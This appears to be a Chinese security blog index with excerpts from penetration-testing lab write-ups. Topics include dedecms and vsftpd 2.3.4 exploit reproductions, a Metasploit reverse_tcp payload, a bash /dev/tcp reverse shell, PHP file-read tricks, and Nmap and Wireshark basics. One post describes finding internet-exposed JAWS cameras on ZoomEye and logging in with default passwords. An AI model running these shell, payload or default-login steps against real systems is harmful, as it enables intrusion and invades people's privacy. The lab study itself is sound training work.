dedecms5.7 sp2前台修改任意用户密码漏洞复现
dedecms5.7 sp2前台修改任意用户密码漏洞复现
复现前的准备下载dedecms5.7 sp2,本人复现用的是UTF8版本的。
传送门
工具phpstudyburp Suite
复现过程首先在本地搭建这个cms,使用phpstudy
把解压后的文件丢进phpstudy的www目录下,可改一下文件夹名,这里改成了dedecms
根据文件下的docs/readme.txt的要求配置环境,然后打开服务,根据提示进行安装
安装事需要到数据库,直接在phpstudy创建
安装成功后进入后台/dedecms/uploads/dede/index.php,进行如下设置
然后访问/dedecms/uploads/member/index.php点击注册
这里注册两个账号(不要设置安全问题)
受害用户 text/123456
攻击者 hacher/123456
站在攻击者的角度,攻击者是不知道受害用户的密码的,现在的目的是登录受害用户的账号
现在先登录攻击者账号再将UR ...
网络渗透实验一
网络渗透实验一实验目的
理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。
实验环境
Kali Linux 2
Windows
网络环境
交换网络结构
实验工具
Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等
实验步骤
1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
谷歌搜索输入:
"network security" filetype:pdf site:www.mit.edu
2、照片中的女生在哪里旅行?
截图搜索到的地址信息。
用谷歌地球搜索图中关键词:LeTrentehuit Cafe Brasserie
*
3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站 ...
花式读取文件
花式读取文件读文件hightlight_file($filename);
show_source($filename);
print_r(php_strip_whitespace($filename));
print_r(file_get_contents($filename));
readfile($filename);
print_r(file($filename)); // var_dump
fread(fopen($filename,”r”), $size);
include($filename); // 非php代码
include_once($filename); // 非php代码
require($filename); // 非php代码
require_once($filename); // 非php代码
print_r(fread(popen(“cat flag”, “r”), $size));
print_r(fgets(fopen($filename, “r”)) ...
Metasploit的简单应用
Metasploit的简单应用1、生成主控端、被控端。2、获得靶机(Windows)控制权。3、下载靶机上任意一个文件。
工具靶机: 关闭了windows安全中心的win10,ip: 192.168.118.132
攻击机:kali ip:192.168.118.128
开搞生成被控端
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.128 LPORT=5000 -f exe > /root/payload.exe
#LHOST=kali的ip
#LPORT=端口
将生成的payload.exe丢进靶机里面
回到kali
运行msfconsole
执行以下命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
执行 show options查看配置
发现LHOST和LPORT还没设置
执行
set lhost 192.168.118.128
set lport 5000
LHOST和LPORT ...
easy file sharing server漏洞复现
easy file sharing server漏洞复现一、漏洞详情Easy File Sharing FTP Server是一款FTP服务程序。 Easy File Sharing FTP Server处理PASS命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为PASS命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。
二、工具靶机: 192.168.118.132、win10(可用其他win系统,把windows安全中心关闭)、安装easy file sharing server
攻击机:192.168.118.128、kali
三、开始复现靶机打开easy file sharing server,把端口改为8000,然后点击restart
在kali用nmap扫描
nmap -sV 192.168.118.0/24
可以发现主机192.168.118.132(靶机)已经在8000端口打开了Easy File Sharing 服务
在kali使用searchsploit工具查找相应的渗透模块 ...
漏洞复现(vsftpd 2.3.4)
漏洞复现(vsftpd 2.3.4)工具:攻击机:kali: 192.168.118.128
靶机:Metasplotable2-Linux: 192.168.118.131
开始复现打开kali终端,执行以下命令
nmap 192.168.118.0/24
发现靶机(192.168.118.131)打开着21端口
nmap -sV 192.168.118.131
这里可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,漏洞就在这里
ftp 192.168.118.131 21
用户名 root:)//':)'是触发条件
密码: sssss //密码可乱来
执行以上命令后发现靶机打开了6200端口,这就是个后门
然后直接连接这个端口
nc 192.168.118.131 6200
成功连接,后门建立了shell,可以开始执行命令
复现结束
zoomeye抓取摄像头
zoomeye抓取摄像头一、打开zoomeye,在搜索框搜索搜索关键词“JAWS”
二、寻找摄像头,点击图中所画的圈内的黑点进入
尝试弱口令(默认口令)
用户名:admin
密码:空
接下来就是一个个尝试了
三、登录成功后,若出现以下情况,就点击“here”下载安装flash
下载并安装成功后,将url复制到flash的搜索框内,点击搜索
然后就能看到摄像头的画面了
NMAP的基本使用
NMAP的基本使用简介 nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术
初次使用(这里使用kali自带的作为演示)
首先我们要知道这工具该怎么用,
在kali打开终端,输入如下命令,可以知道有哪些命令
nmap -h
最基本的命令nmap ip(域名)//可以扫描出其对外开放的服务
如
nmap www.baidu.com
nmap xxx.xxx.xxx.xxx
端口扫描常用参数
-sT TCP connect()扫描:这是最基本的TCP扫描方式。connect()是一种系统调用,由操作系统提供,用来打开一个连接。如果目标端口有程序监听,connect()就会成功返回,否则这个端口是不可达的。
-sS TCP同步扫描(TCP SYN):因为不必全部打开一个TCP连接,所以这项技术通常称为半开扫描(half-open)。你可以发出一个TCP同步包(SYN),然后等待回应。如果对方返回SYN|ACK(响应)包就表示目标端口正在监听;如果返回RST数据包,就表示目标端口 ...
linux反弹shell
linux反弹shell客户机:ubuntu
ip: 192.168.118.130
攻击机:kali
ip:192.168.118.128
1.bash反弹攻击机执行命令:
nc -lvp 8888
客户机执行命令:
bash -i >& /dev/tcp/192.168.118.128/8888 0>&1
然后攻击机这边成功拿到shell
原理bash -i >& /dev/tcp/远程ip/port 0>&1
bash是/bin/目录下的二进制程序
/dev/tcp是Linux中的一个特殊设备,打开这个文件相当于发出了一个socket调用,建立一个socket连接。
0>&: 当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
0>&1: 在命令后面加上0>&1,表示将标准输入重定向到标准输出,这里的标准输出已经重定向到了/dev/tcp/远程ip/port这个 ...
Wireshark分析ping的数据包
Wireshark分析ping的数据包1.抓取ping数据包打开Wireshark 开启抓包,打开cmd输入ping github.com 回车
在Wireshark的中条件过滤栏输入“icmp”
可以看到8个报文,其中有4个请求报文和4个应答报文
2.分析其中一个报文(request)物理层可以看到ping request数据链路层报文一共有74个字节,帧序号为258,使用的协议为icmp协议
数据链路层这里有发送数据帧的源节点MAC地址和接收数据帧的目标节点MAC地址
网络层这里包含着发送数据帧的源节点IP地址和接收数据帧的目标节点IP地址
传输层